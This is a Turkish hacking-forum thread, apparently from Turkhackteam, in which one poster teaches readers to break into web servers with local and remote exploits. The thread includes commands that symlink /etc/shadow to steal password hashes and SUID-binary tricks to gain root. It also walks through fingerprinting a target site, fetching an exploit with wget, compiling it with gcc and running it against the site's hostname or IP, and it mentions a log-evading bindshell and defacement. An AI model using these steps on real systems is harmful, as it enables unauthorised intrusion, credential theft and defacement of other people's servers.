* EXPLOİT hakkında*günümüz eniyi hackyöntemlerinden*videolu anlatımla birlikte*

3333

Emektar
27 Ara 2005
3,212
45
Little Town.
Exploit sizi bir sitede veya serverda * kısık yetki veya tam yetki verebilen*tabi bu işlevi sistemde ki açıklardan faydalanarak yapan küçük programcıklardır.

Exploitler genel olarak .c ve .pl dilleriyle yazılır/çoğunluktadır.C uzantılı exploitler "C" programlama dili ile yazılıp* .pl uzantılı exploitler ise "PERL" dili ile yazılmıştır.Exploit yazmak kolay iş değildir*gerçekten programlamada çok fazla profesyonellik gerektirir.
Exploitler iki gruba ayrılır;

1-Local Exploitler; Local exploitler bulunduğun makinada yani mesela xx hosttan bi alan aldık işte bu alanda bize verilen kısıtlı yetkiyi açıp tam yetki alabilmektir.Bu görevi Local Exploitler görür.

Not:Bir serverda accaountun yoksa o makinaya local exploit yediremezsin.Ancak Remote exploit ile servera düşüp oradanda local exploiti yedirebilirsin.

2-Remote Exploit;Remote exploitte ise bizim serverla hiçbir alakamız olmaz exploiti deneriz oda açık warsa bizi root olacak servera sızdırır(root türü)bir exploitse.

Exploitler ham(kaynak kod) şeklinde olduğu için bizim bunu derlememiz gerekmektedir.Exploitlerin çoğu Linux sisteminde derlenmek üzre hazırlanır.Derlemek için Linux makinedeki "gcc" compileri(derleyicileri) bu iş için çok uygundur.Eğer exploitleri Windows altında derlemek istiyorsanız "SHell" hesabı gerekecektir ve Shelldeki gcc'leri kullanarak derliyebileceğiz.

Shell Nedir?Ne anlama gelir; Shell Linux SiSTEMden verilen kısıtlı yetkilere sahip olduğumuz alan gibi birşeydir.Buna ancak Putty aracılığıyla bağlanılabilir.Kullanılan port ve protokol:SSH protokolu ve 22. Porttur.Bizde bu shell hesabında exploitte derleyebileceğiz.

Putty'yi Googlede arıyarak bulabilirsiniz.

Puttyin kullanımına gelince ; Host Name ( or IP adress)" yazan kutucuğa shell inizin ip adresini gireceksiniz."Protocol" seçeneğine bağlanmak isteediğiniz birimi girin; SSH VEYA TELNET. Sonra Opena basıcağız SOnra siyah bi ekran çıkıp önce Username sonra passawordunuzu isticek sizde girip enterlayın.
Ewet Shelle bağlanabildiğimize göre; Bikaç derlemede işimize yarayacak komutlar:

ls : olduğunuz dizindeki dosyaları listeler.. (örnek: ls )
rm -rf dosyaadi : belirttiğiniz dosyayı siler.. (örnek: rm -rf apache.c)
wget : Dosya çekmeye yarar... (örnek: wget https://tik.lat/CUInS )
gcc -o : C dilinde yazılmış programları derleme komutudur.Biz genellikle bunu exploit kodlarını derlemek için kullanacağız (örnek: gcc -o Apache Apache_1.3.x.c)
./ : Çalıştırma komutudur.. (örnek: ./Apache)

Gireceğimiz sistemin bilgilerini almamız gerekir işletim bilgilerini yani; https://tik.lat/wwSEB sitesinden server infosunu alıyoruz.Gerekli exploiti temin edeceğiz ve derliyeceğiz.
./bindshel komutu binshell kurma komutudur;Sistemin bizim loglarımızı kaydetmemesi için trojan niteliğindedir.

PERL EXPLOİTLERİ DERLEME

https://tik.lat/ZgBjH Adresinden Active Perl download ediyoruz.
Active Perl bizim .pl uzantılı esxploitlerimizi derlemeye yarar.Bir exploitin .pl mi .c mi olduğunu basit bir şekilde anlayabiliriz. usr\bin\perl gibi bir kod warsa perl include gibi kodlar warsa .c türü exploittir.
Neyse Active Perl'i download ettik.
Active Perl direk C dizinine kurulur.Biz exploitimizi C:/Perl/Bin/ dizini içerisine atacağız.Mesela exploitimizin adı ajann.pl olarak hesap edelim.

Başlat çalıştıra gelip; Cmd Enter yapıyoruz.Daha sonra iki kere cd.. cd.. yazıp enterlıyoruz(sırayla tabi).Sonrasına yine komutları giriyoruz; "cd perl" enter ve ardından "cd bin" enterlıyoruz ve direk C:/Perl/Bin/ DİZİNİ içerisine düşüyoruz.Sonra exploiti derlemek için;

Kod:
C:\perl\bin>perl ajann.pl https://tik.lat/gIIbL


Tabi buna çeşitli -i vs.. suretler getirilmeyle çalışır.Exploiti kodlayan kişi içinde sunar bize ne kullanmamız gerektiğini.

Bu şekilde derleyebiliriz tabi bu komutların sonuna bi kaç ek gelebilir*bunun içinde Linux komutlarını iyi bilmeniz yararlı olacaktır.
* geldik exploit siteleri*
https://tik.lat/DFfI2
https://tik.lat/t8o9o
https://tik.lat/oyeQ6
https://tik.lat/bP3OW
https://tik.lat/RpCgC
https://tik.lat/aUAYS
Bildiğimiz gibi herkes basit yöntemlerle davsla* ddos ve flood saldırı programlarıyla siteleri hacklemeye çalışıyolar ve elimize %10 luk bir verim ancak geçiyo bi siteye saldıran kişi siteyi en fazla 15-20 dk yawaşlatıyo daha sonra ne oluyo eskisi haline dönüyo index çakma açığıda kapandı artık yani çoğu sitede yok.

Bunun için ben ilk adımı atmak istedim içimizde exploiti çok az bilenler varsada onlarda farkındalarki günümüzün en iyi hack olayı exploitlerle yapılıyo şimdi.

Exploitlerle sistem üzerinde root yetkisi kazanıyoruz ve siteye istediğimz şekli veriyoruz çoğumuzun linux işletim sistemi olmasada bunu perl programı ile windows ortamında yapmak mümkün. ŞİMDİ sizlere EXPLOİT İLE ilgili bilgiler ve örnek bir video görüntüsü vereceğim.

exploit nedir ve bazı açıklar

Isletim sistemlerinin*çok kullanici ile sistemlerde kullanilmaya baslamasiyla birlikte sistemlerde kullanicilarin yetkisi de sözkonusu olmustur. Kisisel isletim Sistemlerinde (örnegin DOS) sistemi ayni anda tek kullanici kullandigi için bütün dosyalara erisebilir* okuyabilir vs. Ancak ayni anda pek çok kisi tarafindan kullanilan Isletim sistemlerinde sistemin bir yöneticisi olmak zorundadir ki bu Novell'de supervisor* Unix ve clone'larinda root* NT'de administrator olarak adlandirilir. Iste bu çok kullanicili sistemlerde yetkisini artirmak isteyen normal kullanicilar sistemde daha yetkili hale gelebilmek için "exploit" dedigimiz programlar yazmislardir. Exploitler isletim sistemi üzerindeki herhangi bir programin eksikliginden yararlanarak kullaniciyi daha yetkili hale getirmeye yararlar. Exploitler local ve remote olarak ikiye ayrilir. Local exploitler isletim sisteminin bir kullanicisiyken uygulanabilir* remote exploitlerde ise sistemin bir kullanicisi olmaniza gerek yoktur. Sistem açiklari ve bu açiklari k
ullanmak için yazilmis exploitler günden güne artmakta ve her sistem açigi için patch'ler yazilmakta. Bazi Isletim Sistemleri için örnek exploitler:

"overflow" exploiti (FreeBSD'de lprm açigi):
Pointer artimetigini kullanarak (Pointer degiskenler degiskenin içindeki bilgiyle birlikte bellek adresini de tutarlar) tampon bellege (buffer) bir string kopyalayarak tasma olusturur. Sistemdeki lprm komutunu kullanir. lprm komutu uzaktaki bir yaziciya gönderilen bir isi iptal etmeye yarar. "lprm -P bloggs" komutuyla is iptal edilebilirken kuyruktaki ikinci bir is ayni anda "lprm -P bloggs bloggs" la iptal edilebilir. Bu da buffer owerflow hatasi meydana getirir. Bu sayede "root" erisimi saglanir. Lokal bir exploittir.

Derleyici ve /tmp Hatalari (Solaris'de gcc tempfile açigi):
Gcc derleyicisinin 2.7.2.x ve önceki sürümlerinde /tmp dizinine (geçici islemlerin yürütüldügü dizin. Windows dizini altindaki temp dizini gibi) sembolik link (bir dosyaya ya da dizine ulasabilmek için konan linkler. Windows'taki .lnk dosyalari gibi) olusturulur ve bu linkten yararlanarak lokal root hakki alinir.

Program Hatalari (Linux'daki X11Amp Programi açigi):
X11Amp çalistirildiginda ~./X11amp isminde bir dosya olusturur. Bu hatayi linux'ta söyle kullanabilirsiniz:

mkdir ~/.x11amp

ln -s /etc/shadow ~/.x11amp/ekl

Bu komutlari yazdiktan sonra X11Amp'i çalistirip "ekl" 'yi seçin bütün girisleri seçip silin. Program çakilacak ve /etc/shadow dosyasini alabileceksiniz.

Microsoft'un FrontPage Server Extensions'unda karsilasilan açiklar: Frontpage extensions'un kullanildigi web sitelerinde pek çok açik bulmak mümkün* örnegin Frontpage 98'de dizin erisim haklari iyi düzenlenmedigi için _vti_pvt dizini "WORLD WRITABLE" olarak düzenlenmis. _vti_pvt dizininde ise "service.pwd" dosyasinda sifreler tutulmakta
 

3333

Emektar
27 Ara 2005
3,212
45
Little Town.
Exploit Nedir* Nasil Kullanilir (Bölüm II)

Bug Nedir?

Bug *kisaca bir isletim sistemi üzerinde bazi hatali programlar yüzünden meydana gelen sistem açikligidir. Bu sistem üzerine kopyalanmis bir oyundan*bir mail programindan yada sistem üzerinde ki IRC programindan bile meydana gelebilir. Bu hatalar bizim sistem de r00t seviyesine çikmamizi saglarlar

mount/umount açigindan baslayabiliriz mesela*

Sistemde /bin dizinine gidin ve umount yada mount isminde bir dosya arayin.. Eger bulamadiysaniz su komutu yazabilirsiniz.

find / -name umount -print -xdev

Dosyanin nerde oldugunu buldugunuzda* o dizine gidip dosyanin özelliklerini görmek için su komutu yazin*

ls -al um*

Eger dosyanin sahibi r00t sa *kesinlikle sistemi kapabiliriz.. Bakalim*

avanak:/bin# ls -al um*

-rwsr-sr-x 1 root 8888 Aug 20 1998 umount

avanak:/bin#

Tamam * artik isler çok çok kolaylasti. Simdi isimiz bir exploit e kaldi. Verecegim exploit sayesinde sistemden takir takir r00t alabileceksiniz Bu exploit i *sisteme yollayip orada compile etmelisiniz. Bunu yapmak için su komutu yazin.

gcc umount.c -o umount (umount yerine istediginiz ismi yazabilirsiniz)

Gcc komutu sayesinde sistemde umount adinda çalistirilabilir bir dosya yaraticaksiniz..

Not : Eger Exploit çalismazsa*komutun basina ./ takisini koymayi deneyin. Ve ardindan 0 - 8 arasi bir sayi ekleyin.Sunun gibi;

./umount 4

yada

./umount 2

Ve sistem elleriniz de ! Artik hersey size kalmis.r00t un neler yapabilecegini anlatmama gerek yok sanirim*

+-+-+-+-+-+-+

Eger bu yol ise yaramazsa(ki bu beni bayagi sasirtir)*simdi anlaticagim yolu denemeniz gerekicek. En sevdigim Exploit bu diyebilirim. Çünkü en kolayi ve de su ana kadar bana hiç sorun yüzü göstermedi. "usr/bin" dizininde splitvt isminde bir dosya arayin.Eger dosya SUID ise yani sahibi r00t ise* olayi bitti sayabiliriz. Bu exploiti sadece "Linux 2-0.3*" sistemlerde kullanabilirsiniz.
Bakalim bu sey nasil çalisiyor?

Dosyayi tabiki ilk olarak sisteme yollayin Ilk önce degisikligi farketmeniz için "whoami" komutu ile kim oldugunuzu ögrenin.Kullanici isminiz ortaya çikicak*

1. Dosyayi "gcc" derleyicisi ile exec(çalistirilabilir) hale getirin* (gcc sp.c sp)

2. Derlediginiz dosyayi çalistirin*

3. "splitvt" adli dosyayi çalistirin*

Isiniz bittikten sonra yine "whoami" komutunu çalistirin.O da ne? r00t da kim yahu?

+-+-+-+-+-+-+
BU da çalismadi diyelim( ki olamaz mümküniyet yok) Tüm Linux dagitimlarinda bulunan bir bug vardir. SendMail bug i* eger buglari takip ediyorsaniz *kesinlikle duymus olmaniz lazim. Ben uzun süredir bu bug la ilgilenmiyordum. Belki patch i bile çikmistir ..Ama denemek te zarar yok diyorsaniz bu kisa exploit i hemen download edin(sm.sh)

..Sisteme yollayin*

Simdi dosyayi * chmod +x leyin.

chmod +x sm.sh

1 . Dosyayi çalistirin*

2 . Sizi /tmp dizinine göndericek*

3 . "ls -l" yazin*

4 . Orda SUID bir sh dosyayi oldugunu göreceksiniz*

5 . "whoami" yazip r00t olup olmadiginiza bakin* eger degilseniz*

6 . "./sh" yazin* ve simdi r00t oldugunuzu görebiliceksiniz..

+-+-+-++-+-+-+

Biraz Linux u birakip diger sistemlere göz atalim.Simdi dalicagimiz sistem bir SunOS.

UnixBased bir sistem çok az farklilikari var.Mesela SunOS ta "gcc" komutu yerine "cc" komutu kullaniliyor.Fakat bunlara pek ihtiyacimiz yok.Çünkü simdi ki sistem de exploit kullanmiyacagiz.SunOS taki 3-4 tane bug tan bir tanesi "dtappgather" komutunun bir bug i. Ben daha önceden bunu bilmiyordum.Geçenlerde göz attigimiz bir SunOS sistemde SegFault *sayesinde ögrenmis oldum.Fakat o sistemde çalismadi.Neyse fazla söze gerek yok .Baslayalim*

Sistemde "dtappgather" adinda bir dosya bulunmasi lazim*bu genelde /var/dt de bulunuyor.Dosyayi buldunuzsa

sorun kalmadi.Bu dosya varsa "generic" de vardir.Tamam simdi /var/dt/appconfig dizinine girin.

$ ls -al

total 6

drwxr-xr-x 3 root root 512 Feb 3 14:22 .

drwxr-xr-x 5 root root 512 Jun 22 11:08 ..

drwxr-xr-x 4 root root 512 Jun 22 10:24 appmanager

$

"generic" dosyasi appmanager adli dizinin içinde bulunuyor.Simdi burda yazicagimiz tek bir komut /etc/shadow

dizinindeki unshadowed passwd dosyasini ele geçirmemizi saglayacak.Komut su ;

$ ln -s /etc/shadow /var/dt/appconfig/appmanager/generic-display-0

Bunu yazdiktan sonra elimize passwd dosyasi geçiyor*artik onu bir Passwd Cracker la kirdiktan sonra elimize r00t un sifreside geçer.
 

3333

Emektar
27 Ara 2005
3,212
45
Little Town.
Exploit kavramı ve bize gerekli olan araçlar;
Exploit bir hostta veya server üzerinde kurulan sistemin açıklarından faydalanarak root ( en yetkili kişi ) yetkisi almaya yarar.Exploit Türkçe açık demek bu yüzden biraz önce yazdığım cümleyi boşverin herşeyin açığı vardır ve herşeyde exploit kullanabiliriz tek düzelikle düşünmeyin.Fakat şuanda ilgilendiğimiz şey internet sitelerinin alt yapısındaki exploitler olduğu için bu klasik tanım olmak zorunda.
Temelde "ilgili" exploitler 2'ye ayrılır :
a)Local exploitler
b)Remote exploitler
Zaten ingilizceniz varsa ne olduğunu anlamışsınızdır.Local exploitler aynı host veya server üzerindeki accountlardan birinde kurulan exploitin diğer tüm serverda etkin olmasıdır.Mesela x sitesi y host firmasından host almış.Bizde gidip y firmasından bir host alıp x sitesinin kurulu olduğu sisteme göre exploiti kendi hostumuzda çalıştırırsak ve y firmasında bu exploite karşı gerekli patchler yapılmamışsa x sitesinde yukarda yazdığım gibi root yetkisine sahip olabiliriz.Şimdiye kadar hiç yapmadım bunu.Remote exploitler ise asıl anlatacağım ve exploitle web hack yapmada kullanılan en etkin yöntemdir.
Asıl önemli olan yerlere geçmeden önce işimize yarayacak site ve programları sıralayalım;
https://tik.lat/ifSMF : Dünyanın en bilinen exploit arşivi her türlü exploiti burdan temin edebilirsiniz.
https://tik.lat/ni6V2 : Exploit kuracağınız sitenin alt yapısını öğrenmek için kullanacağımız site.
https://tik.lat/ibh7U : Active Perl'in download sitesi*bunu kullanarak perl ile yazılmış exploitleri derliyeceğiz.
Bir adet tamamen size ait olan bir shell hesabı.
Putty programı:shelle bağlanmada kolaylık sağlar.Google da felan aratarak kolaylıkla bulunabilir.
Shellde derleme ve bağlanma için kullanacağımız unix veya linux komutları: (aşağıda bir kısmını yazdım olmayanları döküman içinde bulabilirsiniz)
ls Dizinde bulunan herşeyi listeler.
ls -a Gizli dosylar ve dizinlerle beraber listeler.
ls -l Bütün dosyları boyut ve tarihini göstererek listeler.
tar -zxpf Uzantısı tar.gz olan sıkıştırılmış dosyaları açar.
tar -xpf Uzantısı .tar olan dosyaları açar.
gunzip Uzantısı .gz olan dosları açar.
cp Dosyayı kopyalar.
mv Bir dosyayı başka bir dizine taşımanızı sağlar yada dosya adını değiştirir.
mkdir Yeni bir dizin oluşturmanızı sağlar.
rmdir Belirtilen dizini silmenizi sağlar.
rm Dosya silmenizi sağlar.
rm -rf Dizin silmenizi sağlar.
cd Belirtilen dizine geçmenizi sağlar.
cd .. Bir üst dizine geçmenizi sağlar.
cd ~ En üst dizine çıkmanızı sağlar.
pwd O anda bulunduğunuz dizini görüntüler.
pico Belirtilen dosyayı text editör ile düzenlemenizi sağlar.
ftp Belirtilen siteye FTP bağlantısı sağlar.
lynx Belirtilen siteyi görüntüler.
df Harddisk istatistiklerini gösterir.
quota Disk kullanımınızı gösterir.
uname İşletim sisteiminin durumunu gösterir.
whoami Kendi bilgilerinizi gösterir.
who Sunucuya bağlı olanları gösterir.
last Hesabınıza yapılan en son bağlantıyı gösterir.
whereis Belirtilen dosyanın nerede olduğunu gösterir.
BitchX IRC programını çalıştırır.
mail Postalarınızı kontrol eder.
ps -x Sizin çalıştırdığınız işlemleri gösterir.
ps -a Sunucuda çalıştırılan tüm işlemleri gösterir.
ps -ux Çalıştırılan işlemlerin CPU/RAM kullanımıyla gösterir.
kill Pid numarası verilen işlemi durdurur.
kill -9 Pid numarası verilen eggdrop işlemini durdurur.
killall Belirtilen program türündeki tüm işlemleri durdurur.
whatis Belirtilen komutun açıklamasını verir.
man Komut hakkında yardım görüntüler
passwd Shell hesabınıza girerken kullandığınız şifreyi değiştirmenizi sağlar.
vhosts yada vhost Sistemde bulunan vhostları (virtual host) listeler.(BNC için kullanabilirsiniz)
-----------------------------
Şimdi pirincin taşlarını ayıkladıktan sonra önemli yere geçebiliriz.
Remote Exploit Kullanımı .C ve .PL Derleme;
Remote exploitler yazımına göre ayrılır genelde işimize yarayanlar .c uzantılı olanlardır.Çok büyük kısmıda bu şekilde yazılmıştır.Exploit yazım olayına inşallah başka bir dökümanda gireriz.Bir siteyi hacklerken bir anda hackliyemezsiniz ön hazırlık gereklidir bunu #1. dökümanı okuyanlar bilir.Herneyse şimdi hackliyeceğimiz sitenin adı "fuzbing.com" olsun. https://tik.lat/ytfMA sitesine giriyoruz ( veya bazı program veya gene başka sitelerde aynı işi yapabiliyor ben bu siteyi kullanıyorum ) buradan fuzbing.com sitesini araştırıyoruz elimize hangi sisteme kurulu (linux*nt vs.) ip bilgisi felan gelecek.Bundan sonra https://tik.lat/Rwwxc sitesinden sistem bilgisine göre arama yapıyoruz.Birçok şey çıkacaktır bunu engellemek için en kapsamlı aramayı yapın ve sonuçta işimize yarayacak bir exploit dosyası bulduk.Diyelim ilk olarak uzantısı .c olsun.
Bu dosyayı indirip herhangi bir hosta atıyoruz.Diyelim fuzbing.freeservers.com gibi bir siteye attık.Ve elimizde şöyle bir adres geçti: https://tik.lat/kMeju
Şimdi önceden SAĞLAM BİR YERDEN ALINMIŞ olan shellimize Putty programıyla bağlanıyoruz.Şimdi fuzbing.freeservers.com a attığımız exploitimizi aşağıdaki komutla shellimize taşıyoruz:

wget https://tik.lat/SaJf2

Böylece shellimizde derlemeye hazır bir exploitimiz oldu.Şimdi derlemeye geçelim:

gcc -o fuzbinginexploiti exploit.c

Bu exploitimizi derleyerek adını "fuzbinginexploiti" haline çevirdi.Şimdi bu exploiti çalıştırmaya geldi sıra:

./fuzbinginexploiti

yazarak exploitimizi aktif hale getiriyoruz.Bundan sonrası ise ipden veya direk site isminden siteyi hacklemeye geliyor:

./fuzbinginexploiti -h https://tik.lat/E0x5M : Bu direk site adını kullanır veya diyelim fuzbing.com un ipisi 207.46.250.119 gibi birşey olsun bunun için:
./fuzbinginexploiti -i 207.46.250.119

Bu şekilde fuzbing.com adlı siteye eğer patchleri yoksa kullandığı sistemin exploiti ile root yetkisi kazanmış olduk bundan sonrası ise o exploitin özelliklerine kalıyor zaten derledikten sonra gerekli bilgi gelecektir.

Şimdi diyelim fuzbing.com da olabilecek exploitleri araştırdığımızda .c uzantılı bir exploit yerine .pl uzantılı bir exploit bulduk.Bunun derlenmesi için Active Perl e ihtiyacımız var https://tik.lat/hfb0I burdan temin edebilirsiniz.
Download tan sonra c:perl gibi bir klasör oluşmuştur.Çektiğimiz exploiti buranın içine atıyoruz ve MS-DOS u açıyoruz ve c:perl klasörüne geliyoruz.Daha sonra aşağıdaki komutla gene .c derlemesi yaptığımız gibi exploiti fuzbing.com da çalıştırıyoruz ve gene root yetkisine sahip oluyoruz.

perl exploit.pl -h https://tik.lat/VoC40
-----------------------------
Bunları uygulamak için en azından biraz programlama linux ve unix bilginiz olması lazım.Zaten linuxun temeli unixe dayanır komutları aynıdır bu yüzden eğer pcinizde linux kuruluysa shell e gerek duymadan .c exploitinizi pcinizden kullanabilirsiniz.
:hugs: bu linkten videoyu indirip uygulamasını izleyip kolayca öğrenin(alntdr) https://tik.lat/Qn9CY
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.